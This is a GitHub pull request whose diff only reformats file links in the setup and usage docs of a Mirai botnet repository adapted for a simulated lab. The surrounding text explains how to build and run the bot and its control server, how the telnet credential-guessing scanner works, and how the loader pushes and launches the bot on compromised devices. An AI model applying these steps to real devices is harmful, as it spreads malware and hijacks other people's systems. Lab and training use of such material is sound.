Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Edit file names #9

Open
wants to merge 3 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
6 changes: 3 additions & 3 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,15 +2,15 @@

The Mirai malware modified for use on NCL/a virtual/simulated environment.

How to setup: [setup-instructions.md](setup-instructions.md)
How to setup: [`setup-instructions.md`](setup-instructions.md)

Requires:
- MySQL
- Go (for building)

How to attack: [attack-instructions.md](attack-instructions.md)
How to attack: [`attack-instructions.md`](attack-instructions.md)

Scanner and Loader instructions: [scanner-and-loader-instructions.md](scanner-and-loader-instructions.md)
Scanner and Loader instructions: [`scanner-and-loader-instructions.md`](scanner-and-loader-instructions.md)

## Credits
- [Mirai-Source-Code](https://github.com/jgamblin/Mirai-Source-Code)
Expand Down
10 changes: 5 additions & 5 deletions scanner-and-loader-instructions.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,20 +4,20 @@
run the bot with the last argument set as `1`
* arguments: `sudo ./debug/mirai.dbg <cnc ip> <local ip> <callback ip> <enable scanner 0/1>`
* e.g. `sudo ./debug/mirai.dbg 10.0.0.1 10.0.0.2 10.0.0.1 1`
* you can also edit [mirai/demo-bot.sh](mirai/demo-bot.sh) to enable the flag for you
* you can also edit [`mirai/demo-bot.sh`](mirai/demo-bot.sh) to enable the flag for you

using the debug, telnet version, the bot will generate random ip addresses and check if a telnet daemon is running on port 23. it will then use its hardcoded list of logins to try to gain access to the device.
* the list of logins is in `scanner_init()` in [mirai/bot/scanner.c](mirai/bot/scanner.c) (use the `enc` tool to convert strings into the required format if you want to add new logins)
* the range of ip addresses it generates can be set here: `get_random_ip()` in [mirai/bot/scanner.c](mirai/bot/scanner.c)
* the list of logins is in `scanner_init()` in [`mirai/bot/scanner.c`](mirai/bot/scanner.c) (use the `enc` tool to convert strings into the required format if you want to add new logins)
* the range of ip addresses it generates can be set here: `get_random_ip()` in [`mirai/bot/scanner.c`](mirai/bot/scanner.c)

### Running the callback server
if successful, the bot will then report the vulnerable ip address, along with its login credentials to the callback server.
* a simple callback server is found here: [mirai/tools/scanListen.go](mirai/tools/scanListen.go), it is built as `scanListen`
* a simple callback server is found here: [`mirai/tools/scanListen.go`](mirai/tools/scanListen.go), it is built as `scanListen`
* run it as: `sudo ./debug/scanListen`
* it listens on port `48102`

### Running the single loader
the single loader takes a list of input ip addresses, login credentials, and a binary to transmit (usually the bot itself). it then logs into each device on the list and uses telnet to transmit the binary. finally, it then launches the binary with the specified arguments.
* it is found here: [mirai/tools/single_load.c](mirai/tools/single_load.c) and is built as `single_load`
* it is found here: [`mirai/tools/single_load.c`](mirai/tools/single_load.c) and is built as `single_load`
* run it as: `./debug/single_load <bind ip> <input file> <path to file_to_load> <argument> <threads> <connections> (debug mode)`
* e.g. `./debug/single_load 10.0.0.1 ./debug/input.txt ./debug/mirai.dbg "10.0.0.1 10.0.0.2 10.0.0.1 0" 1 1 1` (having the last argument, of any value, means that it runs in debug mode)
12 changes: 6 additions & 6 deletions setup-instructions.md
Original file line number Diff line number Diff line change
Expand Up @@ -26,7 +26,7 @@ We'll need to update the `sources.list` to get `apt-get` working (only applies t
### Installation Instructions for Running cnc (assumes you have already built it)
1. install mysql: `sudo apt-get install mysql-server mysql-client`
* make sure you set the root password as `root` during the installation
2. run [scripts/db.sql](scripts/db.sql) in the mysql shell
2. run [`scripts/db.sql`](scripts/db.sql) in the mysql shell
```
<in the scripts folder>
$ mysql -u root -p
Expand All @@ -47,13 +47,13 @@ We'll need to update the `sources.list` to get `apt-get` working (only applies t
4. restart mysql: `sudo service mysql restart`
5. run the cnc: `sudo ./cnc`
6. in order to access the cnc, use `telnet localhost` (assumes you are telnet-ing on the cnc machine)
7. use `username: root` and `password: root` to login (as defined in [scripts/db.sql](scripts/db.sql))
8. refer to [attack-instructions.md](attack-instructions.md) for how to launch an attack
7. use `username: root` and `password: root` to login (as defined in [`scripts/db.sql`](scripts/db.sql))
8. refer to [`attack-instructions.md`](attack-instructions.md) for how to launch an attack

### Instructions for Running bot (assumes you have already built it)
1. run the bot: `sudo ./debug/mirai.dbg <cnc ip> <local ip> <callback ip> <enable scanner 0/1>` (assumes you have built the debug version)
* e.g. `sudo ./debug/mirai.dbg 10.0.0.1 10.0.0.2 10.0.0.1 0`
* you can use [mirai/demo-bot.sh](mirai/demo-bot.sh) that automatically finds the ip address of eth0 (be sure to change the hardcoded cnc and callback ip addresses)
* you can use [`mirai/demo-bot.sh`](mirai/demo-bot.sh) that automatically finds the ip address of eth0 (be sure to change the hardcoded cnc and callback ip addresses)

### Installation Instructions for Building
1. install golang
Expand All @@ -62,7 +62,7 @@ We'll need to update the `sources.list` to get `apt-get` working (only applies t
$ sudo apt-get update
$ sudo apt-get install golang
```
2. run [scripts/cross-compile.sh](scripts/cross-compile.sh) (needs root)
2. run [`scripts/cross-compile.sh`](scripts/cross-compile.sh) (needs root)
3. add export paths in `~/.bashrc` (you may need to restart bash after this step)
```
add the following lines:
Expand All @@ -74,7 +74,7 @@ We'll need to update the `sources.list` to get `apt-get` working (only applies t
5. install go packages
* `go get github.com/go-sql-driver/mysql`
* `go get github.com/mattn/go-shellwords`
6. build using [mirai/build.sh](mirai/build.sh)
6. build using [`mirai/build.sh`](mirai/build.sh)
* e.g. `mirai/build.sh debug telnet`
* only the debug, telnet version has been tested
* output files will be in the `debug` folder, with `cnc` and `mirai.dbg` (the bot)